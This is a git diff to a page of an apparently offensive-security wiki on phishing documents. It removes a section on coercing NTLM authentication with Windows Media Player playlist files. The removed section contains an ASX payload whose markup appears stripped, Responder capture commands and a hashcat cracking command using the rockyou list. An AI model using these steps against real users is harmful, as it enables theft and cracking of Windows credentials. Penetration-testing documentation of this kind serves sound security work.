diff --git a/src/generic-methodologies-and-resources/phishing-methodology/phishing-documents.md b/src/generic-methodologies-and-resources/phishing-methodology/phishing-documents.md index cb288e2fd..e08280215 100644 --- a/src/generic-methodologies-and-resources/phishing-methodology/phishing-documents.md +++ b/src/generic-methodologies-and-resources/phishing-methodology/phishing-documents.md @@ -160,38 +160,6 @@ There are several ways to **force NTLM authentication "remotely"**, for example, ../../windows-hardening/ntlm/places-to-steal-ntlm-creds.md {{#endref}} -### Windows Media Player playlists (.ASX/.WAX) to coerce NTLM - -If a workflow automatically previews media (e.g., HR reviewing uploads) using Windows Media Player, you can leak Net-NTLMv2 by providing a playlist that references a UNC path. When WMP loads the entry, it attempts SMB access with implicit NTLM authentication. - -Example ASX payload (also supported by .WAX): - -```xml - - Leak - - - - - -``` - -Collect and crack the hash: - -```bash -# Capture Net-NTLMv2 -sudo Responder -I -# Or run via uv if you manage dependencies with it -# sudo uv run --script Responder.py -I - -# Crack (hashcat auto-detects NetNTLMv2, mode 5600) -hashcat ntlm.hash /opt/SecLists/Passwords/Leaked-Databases/rockyou.txt -``` - -Notes -- Use ntlm_theft to generate ready-made WMP coercion files: https://github.com/Greenwolf/ntlm_theft -- If NTLM signing/SMB egress is blocked or NTLM disabled, this won’t work. Otherwise, it’s effective when targets auto-open or preview uploaded playlists. - ### NTLM Relay Don't forget that you cannot only steal the hash or the authentication but also **perform NTLM relay attacks**: @@ -256,4 +224,4 @@ Hunting/IOCs - [ntlm_theft – NTLM coercion file generator](https://github.com/Greenwolf/ntlm_theft) - [Responder](https://github.com/lgandx/Responder) -{{#include ../../banners/hacktricks-training.md}} \ No newline at end of file +{{#include ../../banners/hacktricks-training.md}}